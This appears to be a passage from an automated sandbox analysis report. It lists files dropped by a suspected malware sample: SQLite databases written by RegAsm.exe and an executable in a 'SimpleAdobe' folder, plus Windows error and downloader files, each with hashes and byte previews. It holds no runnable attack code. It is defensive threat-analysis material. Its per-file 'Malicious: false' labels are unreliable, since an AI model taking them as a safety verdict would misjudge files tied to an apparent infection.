Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JDGHIIJK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JDGIIJJDHDGCGDHIJDAKJKKKFH

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JJJEBGDAFHJEBGDGIJDH

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KATAXZVCPS.docx

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Reputation:	unknown
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\ProgramData\KEHJKJDGCGDAKFHIDBGC

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KJJJJDHI

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.307376130929931
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrr:KooCEYhgYEL0In
MD5:	16CFFF89ED4CF0FD0D9EDE21584A7064
SHA1:	FFBE4EC873160D53C5CE72D5754A275FF767A73C
SHA-256:	13D7BC508E34FADB9649836C9884C144DCBF5C1B4AC5EBED2FE574E010097B98
SHA-512:	17F87DE08586C39353B47B5E4818F28AA23199E4975363479E54E108B4F0DAAE5FDA1A289A9583FFB76589AFBCFB8E9020ADD61A143208687956B17969FC9A33
Malicious:	false
Reputation:	unknown
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x47593c27, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.42212377673960627
Encrypted:	false
SSDEEP:	1536:RSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Raza/vMUM2Uvz7DO
MD5:	9A45420E04911077BFDC5EBFA980C9F0
SHA1:	0E57E0D2C2DD42A5966A2265F6CB29C2E338C8AD
SHA-256:	BF7E5B3A5E46EA759D4CEADC0634F4927B8F4932CE04E111A4DC4106F5F144E7
SHA-512:	E61C434A89551AED525EFBB063DA88BDA0D9C13B2511751BF4FED9152D829A66AEC32BAB49BB4E867BA84BCC308C54ED745BD7CE97247C368A6D23DD63C7D102
Malicious:	false
Reputation:	unknown
Preview:	GY<'... .......A.......X\...;...{......................0.!..........{A......\|E.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................?..u.....\|..................%.GW.....\|c..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07571882773507696
Encrypted:	false
SSDEEP:	3:yWlyYeJW5uGPhvCjn13a/AYZ4XlAllcVO/lnlZMxZNQl:SzJ+ha53qAyoAOewk
MD5:	4F3DEB1865F5214A1407116CCB6B7DD7
SHA1:	4543209202B08F5C09C552E42A603D79F5EFAB75
SHA-256:	4EDAE4D09ED5587E02361419DE5CE142124AF53205DD3F7857143C7A34CCDCC3
SHA-512:	C6D9DC8210FBCA91DB9AB9985E1A31E5B607ECEB398C10AED3DD5AB7D1287D1E4800B29D1FC6A9CB04BB94CC3252B40C1459654A384C61B9E9BFA7766D495DB4
Malicious:	false
Reputation:	unknown
Preview:	...U.....................................;...{.......\|c......{A..............{A......{A..........{A]................%.GW.....\|c.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_fq9BbqPKEgDrDHrc_8f8cf4c7a5fd289cbc8ed3d0cac759ac182be12b_96367943_736ffae6-95f5-49e9-8c4d-668f772a829d\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9047929240598492
Encrypted:	false
SSDEEP:	96:90FuoIjssv7qJzxTMbfGQXIDcQvc6QcEVcw3cE/Ny++BHUHZ0ownOgHkEwH3dEFs:yQoIjfGNc0BU/yaGvzuiFkZ24IO8+
MD5:	DCFEBA255B4ABA3A2D39EB48D677E9E3
SHA1:	B7B2E317C72B379D6B37D5F691ED936EFFE74281
SHA-256:	6C3F032CB6B13A2473C0F139480BF864BFA91F2482EA12873A6E33F4FD4EEEA8
SHA-512:	208D3C7D138ED389DCF465EDDE1C2576B6DF66E4A43F17CA6E85195251D1044A61EA95B0CCD2B6D835EFFCBFA217976E1509AE4BBF09AB485515A52CD308FC68
Malicious:	false
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.6.0.8.7.3.2.8.1.3.7.1.7.1.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.6.0.8.7.3.3.1.0.2.7.8.1.3.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.3.6.f.f.a.e.6.-.9.5.f.5.-.4.9.e.9.-.8.c.4.d.-.6.6.8.f.7.7.2.a.8.2.9.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.2.c.c.6.2.2.4.-.b.0.4.f.-.4.2.d.b.-.a.7.b.1.-.1.5.1.3.e.f.1.4.7.0.7.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.q.9.B.b.q.P.K.E.g.D.r.D.H.r.c.1.A.r.u.5.z.u.A...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.I.n.s.t.r.u.m.e.n.t.a.l...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.d.0.-.0.0.0.1.-.0.0.1.4.-.f.7.0.7.-.8.9.0.f.e.8.8.0.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.6.a.2.e.d.b.6.b.b.5.1.0.7.3.7.a.9.b.2.c.c.e.f.6.c.d.6.d.4.4.2.0.0.0.0.0.0.0.0.!.0.0.0.0.e.b.7.a.3.a.c.7.4.b.a.a.7.4.8.c.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER17C0.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	90170
Entropy (8bit):	3.061326253586454
Encrypted:	false
SSDEEP:	1536:5OIGXcPuJQf7pacDO/HmwjOTBamLo11aWRw:5OIGXcPuJQf7pacDO/Hmwj0BamLo11at
MD5:	A9326F5E6E75B20DBDB8147A1FFE0A17
SHA1:	FA17FE1B6C2CD92CF1606B1AC7D68FC6FD6ACA83
SHA-256:	459F8E1AC00205E51FA6F6E729DF4AB59BF104879FC19BF4E90D36B5B1175672
SHA-512:	A2AF2B451191FA1ED084E7DCA7AA453B8AFB3E737D14D77D7498D367C605741C6F7829B58C8963CADA91D4C85C6A6DB4E675900CB71721922FC9663926CB34DB
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1800.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.696497164241952
Encrypted:	false
SSDEEP:	96:TiZYWrhZTz17YQ9YlWPHzYEZUoztDi1LCPVDwki1xcj+akfaAM8eUI510:2ZDrfxV9a2iQj+akiAM8eD510
MD5:	E9A773C0CC5658E4B9CCA41BA5984321
SHA1:	F3B55F11F8E9126DFE87D6776A7C36ABB44C2EF4
SHA-256:	AFB109198096861F5FED2DEFA4805BA13859BBD9134A58D9C71C51605C4A5D2B
SHA-512:	6195301D211F2A5A8F1DC6340D0286245E519686B2028B51D56D595CED5EF07578CD68F88356429ACE1A8126CCE9760A157A6904BBE32C575C48265C7F31654C
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3B9.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	90992
Entropy (8bit):	3.0607775873936194
Encrypted:	false
SSDEEP:	1536:xv/LoVKaPCTgEYKcAT3y0aOiMTBamLV1VKWR5:xv/LoVKaPCTgEYKcAT3y0aOiKBamLV1x
MD5:	004FAE78D78C549A97C59D2A58371856
SHA1:	55FA616D488826A2DCEA2EAF3C913A8801AB05A8
SHA-256:	D7D950AE84DD846700DEEF6931CC1943BB3EA10A42BDF2B65A46F92874A7DB14
SHA-512:	26673EDC0BD40367114C4D9D30B0B550B2094E1EF8A0E4E65132F3D0B340BA46A5511329D84B472666E66103C8CF3A64A310EC718E0212E19C754D8572B1B7D2
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3DA.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.697316207825637
Encrypted:	false
SSDEEP:	96:TiZYWJdX4LYPYBWfHzYEZdBStDi4LMPVtw+ISLanfal+eMpenIM10:2ZDCorBldanilJMpeIM10
MD5:	DDB4CFE7F709BBDCD031F7DFFA1F98F9
SHA1:	324D122BB74625A45E089664FD1D518776A183CE
SHA-256:	1971793C00549B43AA79678DF186771D168EC9A4496FEDDA037F441EAAC9716F
SHA-512:	1B22D9EAA2DC73AA94BE36A5E5B5152195BB2701CE91CAFE95380713666C70FECAC9A0FDFEF3895615F8498AEF16B7E7CA15B93E397AE52CA8ADB6583A31096A
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4C44.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	94782
Entropy (8bit):	3.058511340357859
Encrypted:	false
SSDEEP:	1536:6+OgIJxBiQZV9u5yGqyhIhlIFjoYEiTBzqblfFzODjf7:6+OgIJxBiQZV9u5yGqyhIhlIFjoYEYBD
MD5:	DFAC91ACCA60C9C237C15C3DA25E14C4
SHA1:	A4AAB37E8E898FFCAC1C009412AA98C02D725FF7
SHA-256:	B515738A47A96605346BD864971B8A1FAA86D22A2E88C7620C39C12C10F8D1E9
SHA-512:	524519D252B8B00DC52D2CD3CDDF2123575450148ACDCD863FE9277F0FAE6B1214EBCB68F59281B01908F024CE7FBDA8F3A81BA07B923775E88E632C4FB3190A
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4CA3.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6936664570010387
Encrypted:	false
